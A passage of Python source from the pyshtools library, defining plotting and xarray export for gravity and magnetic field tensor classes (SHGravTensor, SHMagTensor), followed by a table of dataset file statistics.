cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_eigh(self, projection=None, tick_interval=[60, 60],
minor_tick_interval=[30, 30], xlabel='',
ylabel='', colorbar='bottom', cmap='viridis',
cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=9,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=8, show=True,
ax=None, fname=None):
"""
Plot the two eigenvalues and maximum absolute value eigenvalue of the
horizontal tensor.
Usage
-----
x.plot_eigh([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, colorbar, cmap, cmap_limits, cmap_reverse,
cb_triangles, cb_label, cb_ylabel, cb_tick_interval,
cb_minor_tick_interval, cb_offset, cb_width, grid,
axes_labelsize, tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [60, 60]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = ''
Label for the longitude axis.
ylabel : str, optional, default = ''
Label for the latitude axis.
colorbar : str, optional, default = 'bottom'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = None
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
axes_labelsize : int, optional, default = 9
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = 8
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if colorbar is not None:
if colorbar in set(['bottom', 'top']):
scale = 2.3
else:
scale = 1.4
else:
scale = 1.65
figsize = (_mpl.rcParams['figure.figsize'][0],
_mpl.rcParams['figure.figsize'][0] * scale)
fig, ax = _plt.subplots(3, 1, figsize=figsize)
self.plot_eigh1(projection=projection, ax=ax.flat[0],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_eigh2(projection=projection, ax=ax.flat[1],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_eighh(projection=projection, ax=ax.flat[2],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
fig.tight_layout(pad=0.5)
if fname is not None:
fig.savefig(fname)
return fig, ax
def to_xarray(self, title='', description='',
comment='pyshtools grid'):
"""
Return all tensor gridded data as an xarray DataSet.
Usage
-----
x.to_xarray([title, description, comment])
Parameters
----------
title : str, optional, default = ''
Title of the dataset.
description : str, optional, default = ''
Description of the dataset ('Remark' in gmt grd files).
comment : str, optional, default = 'pyshtools grid'
Additional information about how the data were generated.
"""
attrs = {'title': title,
'description': description,
'comment': comment,
'nlat': self.nlat,
'nlon': self.nlon,
'lmax': self.lmax,
'lmax_calc': self.lmax_calc,
'sampling': self.sampling,
'grid': self.grid,
'a': self.a,
'f': self.f,
'n': self.n,
'extend': repr(self.extend)
}
if isinstance(self, SHGravTensor):
attrs['gm'] = self.gm
if self.epoch is not None:
attrs['epoch'] = self.epoch
desc = 'gravity tensor component '
else:
if self.year is not None:
attrs['year'] = self.year
desc = 'magnetic field tensor component '
_vxx = self.vxx.to_xarray(title=desc+'(Vxx)', long_name='$V_{xx}$',
units=self._vii_units)
_vxy = self.vxy.to_xarray(title=desc+'(Vxy)', long_name='$V_{xy}$',
units=self._vii_units)
_vxz = self.vxz.to_xarray(title=desc+'(Vxz)', long_name='$V_{xz}$',
units=self._vii_units)
_vyx = self.vyx.to_xarray(title=desc+'(Vyx)', long_name='$V_{yx}$',
units=self._vii_units)
_vyy = self.vyy.to_xarray(title=desc+'(Vyy)', long_name='$V_{yy}$',
units=self._vii_units)
_vyz = self.vyz.to_xarray(title=desc+'(Vyz)', long_name='$V_{yz}$',
units=self._vii_units)
_vzx = self.vzx.to_xarray(title=desc+'(Vzx)', long_name='$V_{zx}$',
units=self._vii_units)
_vzy = self.vzy.to_xarray(title=desc+'(Vzy)', long_name='$V_{zy}$',
units=self._vii_units)
_vzz = self.vzz.to_xarray(title=desc+'(Vzz)', long_name='$V_{zz}$',
units=self._vii_units)
dataset = _xr.Dataset({'vxx': _vxx, 'vxy': _vxy, 'vxz': _vxz,
'vyx': _vyx, 'vyy': _vyy, 'vyz': _vyz,
'vzx': _vzx, 'vzy': _vzy, 'vzz': _vzz},
attrs=attrs)
if self.i0 is not None:
if isinstance(self, SHGravTensor):
desc0 = 'First invariant of the gravity tensor'
desc1 = 'Second invariant of the gravity tensor'
desc2 = 'Third invariant of the gravity tensor'
desc = 'Unitless invariant of the gravity tensor'
else:
desc0 = 'First invariant of the magnetic field tensor'
desc1 = 'Second invariant of the magnetic field tensor'
desc2 = 'Third invariant of the magnetic field tensor'
desc = 'Unitless invariant of the magnetic field tensor'
_i0 = self.i0.to_xarray(title=desc0,
long_name='$I_0$, Tr $V_{ii}$',
units=self._i0_units)
_i1 = self.i1.to_xarray(title=desc1, long_name='$I_1$',
units=self._i1_units)
_i2 = self.i2.to_xarray(title=desc2,
long_name='$I_2$, det $V_{ij}$',
units=self._i2_units)
_i = self.i.to_xarray(title=desc,
long_name='$-(I_2/2)^{2} / ' +
'(I_1/3)^{3}$',
units='none')
dataset['i0'] = _i0
dataset['i1'] = _i1
dataset['i2'] = _i2
dataset['i'] = _i
if self.eig1 is not None:
if isinstance(self, SHGravTensor):
desc1 = 'First eigenvalue of the gravity tensor'
desc2 = 'Second eigenvalue of the gravity tensor'
desc3 = 'Third eigenvalue of the gravity tensor'
else:
desc1 = 'First eigenvalue of the magnetic field tensor'
desc2 = 'Second eigenvalue of the magnetic field tensor'
desc3 = 'Third eigenvalue of the magnetic field tensor'
_eig1 = self.eig1.to_xarray(title=desc1,
long_name='${\lambda}_1$',
units=self._vii_units)
_eig2 = self.eig2.to_xarray(title=desc2,
long_name='${\lambda}_2$',
units=self._vii_units)
_eig3 = self.eig3.to_xarray(title=desc3,
long_name='${\lambda}_3$',
units=self._vii_units)
dataset['eig1'] = _eig1
dataset['eig2'] = _eig2
dataset['eig3'] = _eig3
if self.eighh is not None:
if isinstance(self, SHGravTensor):
desc1 = 'First horizontal eigenvalue of the gravity tensor'
desc2 = 'Second horizontal eigenvalue of the gravity tensor'
desc3 = 'Combined horizontal eigenvalue of the gravity tensor'
else:
desc1 = 'First horizontal eigenvalue of the magnetic ' \
+ 'field tensor'
desc2 = 'Second horizontal eigenvalue of the magnetic ' \
+ 'field tensor'
desc3 = 'Combined horizontal eigenvalue of the magnetic ' \
+ 'field tensor'
_eigh1 = self.eigh1.to_xarray(title=desc1,
long_name='${\lambda}_{h1}$',
units=self._vii_units)
_eigh2 = self.eigh2.to_xarray(title=desc2,
long_name='${\lambda}_{h2}$',
units=self._vii_units)
_eighh = self.eighh.to_xarray(title=desc3,
long_name='${\lambda}_{hh}$',
units=self._vii_units)
dataset['eigh1'] = _eigh1
dataset['eigh2'] = _eigh2
dataset['eighh'] = _eighh
return dataset
class SHGravTensor(Tensor):
"""
Class for the gravity field tensor and eigenvalues. The class is
initialized from a class instance of SHGravCoeffs using the method
tensor().
Attributes:
vxx, vxy, vzz, : The 9 components of the gravity tensor.
vyx, vyy, vyz,
vzx, vzy, vzz
i0, i1, i2, i : The three invariants of the gravity tensor and a
derived quantity that is bounded between 0 and 1.
These are computed by a call to compute_invar().
eig1, eig2, eig3 : The three eigenvalues of the gravity tensor, which are
computed by a call to compute_eig().
eigh1, eigh2, : The horizontal eigenvalues of the gravity tensor, which
eighh are computed by a call to compute_eigh().
gm : The gravitational constant times the mass of the body.
a : Semimajor axis of the reference ellipsoid.
f : Flattening of the reference ellipsoid, f=(a-b)/a.
lmax : The maximum spherical harmonic degree resolvable by the
grids.
lmax_calc : The maximum spherical harmonic degree of the
gravitational potential used in creating the grids.
units : The units of the gridded data.
epoch : The epoch time of the gravity model.
nlat, nlon : The number of latitude and longitude bands in the grids.
n : The number of samples in latitude.
sampling : The longitudinal sampling for Driscoll and Healy grids.
Either 1 for equally sampled grids (nlat=nlon) or 2 for
equally spaced grids in degrees.
extend : True if the grid contains the redundant column for
360 E and the unnecessary row for 90 S.
Methods:
plot() : Plot all 9 components of the gravity tensor.
plot_vxx() : Plot the vxx component of the gravity tensor.
plot_vxy() : Plot the vxy component of the gravity tensor.
plot_vxz() : Plot the vxz component of the gravity tensor.
plot_vyx() : Plot the vyx component of the gravity tensor.
plot_vyy() : Plot the vyy component of the gravity tensor.
plot_vyz() : Plot the vyz component of the gravity tensor.
plot_vzx() : Plot the vzx component of the gravity tensor.
plot_vzy() : Plot the vzy component of the gravity tensor.
plot_vzz() : Plot the vzz component of the gravity tensor.
compute_invar() : Compute the invariants of the gravity tensor.
plot_i0() : Plot the first invariant I0 of the gravity tensor.
plot_i1() : Plot the second invariant I1 of the gravity tensor.
plot_i2() : Plot the third invariant I2 of the gravity tensor.
plot_i() : Plot the derived quantity I = -(I2/2)**2 / (I1/3)**3.
compute_eig() : Compute the three eigenvalues of the gravity tensor.
plot_eig() : Plot the three eigenvalues of the gravity tensor.
plot_eig1() : Plot the first eigenvalue of the gravity tensor.
plot_eig2() : Plot the second eigenvalue of the gravity tensor.
plot_eig3() : Plot the third eigenvalue of the gravity tensor.
compute_eigh() : Compute the horizontal eigenvalues of the gravity tensor.
plot_eigh() : Plot the two horizontal eigenvalues and the combined
maximum absolute eigenvalue of the gravity tensor.
plot_eigh1() : Plot the first horizontal eigenvalue of the gravity
tensor.
plot_eigh2() : Plot the second horizontal eigenvalue of the gravity
tensor.
plot_eighh() : Plot the combined maximum absolute eigenvalue of the
gravity tensor.
to_xarray() : Return an xarray DataSet of all gridded data.
copy() : Return a copy of the class instance.
info() : Print a summary of the data stored in the SHGravTensor
instance.
"""
def __init__(self, vxx, vyy, vzz, vxy, vxz, vyz, gm, a, f, lmax,
lmax_calc, units='Eötvös', epoch=None):
"""
Initialize the SHGravTensor class.
"""
self.vxx = _SHGrid.from_array(vxx, grid='DH', units=units)
self.vyy = _SHGrid.from_array(vyy, grid='DH', units=units)
self.vzz = _SHGrid.from_array(vzz, grid='DH', units=units)
self.vxy = _SHGrid.from_array(vxy, grid='DH', units=units)
self.vxz = _SHGrid.from_array(vxz, grid='DH', units=units)
self.vyz = _SHGrid.from_array(vyz, grid='DH', units=units)
self.vyx = self.vxy
self.vzx = self.vxz
self.vzy = self.vyz
self.grid = self.vxx.grid
self.sampling = self.vxx.sampling
self.nlat = self.vxx.nlat
self.nlon = self.vxx.nlon
self.n = self.vxx.n
self.extend = self.vxx.extend
self.gm = gm
self.a = a
self.f = f
self.lmax = lmax
self.lmax_calc = lmax_calc
self.i0 = None
self.i1 = None
self.i2 = None
self.i = None
self.eig1 = None
self.eig2 = None
self.eig3 = None
self.eigh1 = None
self.eigh2 = None
self.eighh = None
self.units = units
self.epoch = epoch
self._vxx_label = '$V_{xx}$, ' + self.units
self._vxy_label = '$V_{xy}$, ' + self.units
self._vxz_label = '$V_{xz}$, ' + self.units
self._vyx_label = '$V_{yx}$, ' + self.units
self._vyy_label = '$V_{yy}$, ' + self.units
self._vyz_label = '$V_{yz}$, ' + self.units
self._vzx_label = '$V_{zx}$, ' + self.units
self._vzy_label = '$V_{zy}$, ' + self.units
self._vzz_label = '$V_{zz}$, ' + self.units
self._i0_label = 'Tr $V_{ii}$, ' + self.units
self._i1_label = '$I_1$, ' + self.units + '$^2$'
self._i2_label = 'det $V_{ij}$, ' + self.units + '$^3$'
self._i_label = '$-(I_2/2)^{2} / (I_1/3)^{3}$'
self._eig1_label = '$\lambda_1$, ' + self.units
self._eig2_label = '$\lambda_2$, ' + self.units
self._eig3_label = '$\lambda_3$, ' + self.units
self._eigh1_label = '$\lambda_{h1}$, ' + self.units
self._eigh2_label = '$\lambda_{h2}$, ' + self.units
self._eighh_label = '$\lambda_{hh}$, ' + self.units
def __repr__(self):
str = ('grid = {:s}\n'
'nlat = {:d}\n'
'nlon = {:d}\n'
'n = {:d}\n'
'sampling = {:d}\n'
'extend = {}\n'
'lmax = {:d}\n'
'lmax_calc = {:d}\n'
'gm (m3 / s2) = {:e}\n'
'a (m)= {:e}\n'
'f = {:e}\n'
'units = {:s}\n'
'epoch = {:s}'
.format(self.grid, self.nlat, self.nlon, self.n, self.sampling,
self.extend, self.lmax, self.lmax_calc, self.gm, self.a,
self.f, repr(self.units), repr(self.epoch)))
return str
class SHMagTensor(Tensor):
"""
Class for the magnetic field tensor and eigenvalues. The class is
initialized from a class instance of SHMagCoeffs using the method
tensor().
Attributes:
vxx, vxy, vzz, : The 9 components of the magnetic field tensor.
vyx, vyy, vyz,
vzx, vzy, vzz
i0, i1, i2, i : The three invariants of the magnetic field tensor and a
derived quantity that is bounded between 0 and 1.
eig1, eig2, eig3 : The three eigenvalues of the magnetic field tensor,
which are computed by a call to compute_eig().
eigh1, eigh2, : The horizontal eigenvalues of the magnetic field
eighh tensor, which are computed by a call to compute_eigh().
a : Semimajor axis of the reference ellipsoid.
f : Flattening of the reference ellipsoid, f=(a-b)/a.
lmax : The maximum spherical harmonic degree resolvable by the
grids.
lmax_calc : The maximum spherical harmonic degree of the
magnetic potential used in creating the grids.
units : The units of the gridded data.
year : The year of the time-variable magnetic field data.
nlat, nlon : The number of latitude and longitude bands in the grids.
sampling : The longitudinal sampling for Driscoll and Healy grids.
Either 1 for equally sampled grids (nlat=nlon) or 2 for
equally spaced grids in degrees.
extend : True if the grid contains the redundant column for
360 E and the unnecessary row for 90 S.
Methods:
plot() : Plot all 9 components of the magnetic field tensor.
plot_vxx() : Plot the vxx component of the magnetic field tensor.
plot_vxy() : Plot the vxy component of the magnetic field tensor.
plot_vxz() : Plot the vxz component of the magnetic field tensor.
plot_vyx() : Plot the vyx component of the magnetic field tensor.
plot_vyy() : Plot the vyy component of the magnetic field tensor.
plot_vyz() : Plot the vyz component of the magnetic field tensor.
plot_vzx() : Plot the vzx component of the magnetic field tensor.
plot_vzy() : Plot the vzy component of the magnetic field tensor.
plot_vzz() : Plot the vzz component of the magnetic field tensor.
compute_invar() : Compute the invariants of the magnetic field tensor.
plot_i0() : Plot the first invariant I0 of the magnetic field tensor.
plot_i1() : Plot the second invariant I1 of themagnetic field tensor.
plot_i2() : Plot the third invariant I2 of the magnetic field tensor.
plot_i() : Plot the derived quantity I = -(I2/2)**2 / (I1/3)**3.
compute_eig() : Compute the three eigenvalues of the magnetic field
tensor.
plot_eig() : Plot the three eigenvalues of the magnetic field tensor.
plot_eig1() : Plot the first eigenvalue of the magnetic field tensor.
plot_eig2() : Plot the second eigenvalue of the magnetic field tensor.
plot_eig3() : Plot the third eigenvalue of the magnetic field tensor.
compute_eigh() : Compute the horizontal eigenvalues of the magnetic field
tensor.
plot_eigh() : Plot the two horizontal eigenvalues and the combined
maximum absolute eigenvalue of the magnetic field tensor.
plot_eigh1() : Plot the first horizontal eigenvalue of the magnetic
field tensor.
plot_eigh2() : Plot the second horizontal eigenvalue of the magnetic
field tensor.
plot_eighh() : Plot the combined maximum absolute eigenvalue of the
magnetic field tensor.
to_xarray() : Return an xarray DataSet of all gridded data.
copy() : Return a copy of the class instance.
info() : Print a summary of the data stored in the SHMagTensor
instance.
"""
def __init__(self, vxx, vyy, vzz, vxy, vxz, vyz, a, f, lmax,
lmax_calc, units=None, year=None):
"""
Initialize the SHMagTensor class.
"""
self.vxx = _SHGrid.from_array(vxx, grid='DH', units=units)
self.vyy = _SHGrid.from_array(vyy, grid='DH', units=units)
self.vzz = _SHGrid.from_array(vzz, grid='DH', units=units)
self.vxy = _SHGrid.from_array(vxy, grid='DH', units=units)
self.vxz = _SHGrid.from_array(vxz, grid='DH', units=units)
self.vyz = _SHGrid.from_array(vyz, grid='DH', units=units)
self.vyx = self.vxy
self.vzx = self.vxz
self.vzy = self.vyz
self.grid = self.vxx.grid
self.sampling = self.vxx.sampling
self.nlat = self.vxx.nlat
self.nlon = self.vxx.nlon
self.n = self.vxx.n
self.extend = self.vxx.extend
self.a = a
self.f = f
self.lmax = lmax
self.lmax_calc = lmax_calc
self.i0 = None
self.i1 = None
self.i2 = None
self.i = None
self.eig1 = None
self.eig2 = None
self.eig3 = None
self.eigh1 = None
self.eigh2 = None
self.eighh = None
self.units = units
self.year = year
if self.units.lower() == 'nt/m':
self._units_formatted = 'nT m$^{-1}$'
self._i1_units = 'nT$^2$ m$^{-2}$'
self._i2_units = 'nT$^3$ m$^{-3}$'
else:
self._units_formatted = 'T m$^{-1}$'
self._i1_units = 'T$^2$ m$^{-2}$'
self._i2_units = 'T$^3$ m$^{-3}$'
self._vxx_label = '$V_{xx}$, ' + self._units_formatted
self._vxy_label = '$V_{xy}$, ' + self._units_formatted
self._vxz_label = '$V_{xz}$, ' + self._units_formatted
self._vyx_label = '$V_{yx}$, ' + self._units_formatted
self._vyy_label = '$V_{yy}$, ' + self._units_formatted
self._vyz_label = '$V_{yz}$, ' + self._units_formatted
self._vzx_label = '$V_{zx}$, ' + self._units_formatted
self._vzy_label = '$V_{zy}$, ' + self._units_formatted
self._vzz_label = '$V_{zz}$, ' + self._units_formatted
self._i0_label = 'Tr $V_{ii}$, ' + self._units_formatted
self._i1_label = '$I_1$, ' + self._i1_units
self._i2_label = 'det $V_{ij}$, ' + self._i2_units
self._i_label = '$-(I_2/2)^{2} / (I_1/3)^{3}$'
self._eig1_label = '$\lambda_1$, ' + self._units_formatted
self._eig2_label = '$\lambda_2$, ' + self._units_formatted
self._eig3_label = '$\lambda_3$, ' + self._units_formatted
self._eigh1_label = '$\lambda_{h1}$, ' + self._units_formatted
self._eigh2_label = '$\lambda_{h2}$, ' + self._units_formatted
self._eighh_label = '$\lambda_{hh}$, ' + self._units_formatted
def __repr__(self):
str = ('grid = {:s}\n'
'nlat = {:d}\n'
'nlon = {:d}\n'
'n = {:d}\n'
'sampling = {:d}\n'
'extend = {}\n'
'lmax = {:d}\n'
'lmax_calc = {:d}\n'
'a (m)= {:e}\n'
'f = {:e}\n'
'units = {:s}\n'
'year = {:s}'
.format(self.grid, self.nlat, self.nlon, self.n, self.sampling,
self.extend, self.lmax, self.lmax_calc, self.a,
self.f, repr(self.units), repr(self.year)))
return str
| 53.207291
| 79
| 0.582389
| 21,376
| 176,595
| 4.66294
| 0.018479
| 0.072596
| 0.053384
| 0.02764
| 0.954823
| 0.949476
| 0.941109
| 0.919829
| 0.91374
| 0.899614
| 0
| 0.006911
| 0.344472
| 176,595
| 3,318
| 80
| 53.223327
| 0.854116
| 0.533311
| 0
| 0.742931
| 0
| 0
| 0.046728
| 0.000907
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029135
| false
| 0
| 0.005998
| 0
| 0.06084
| 0.001714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.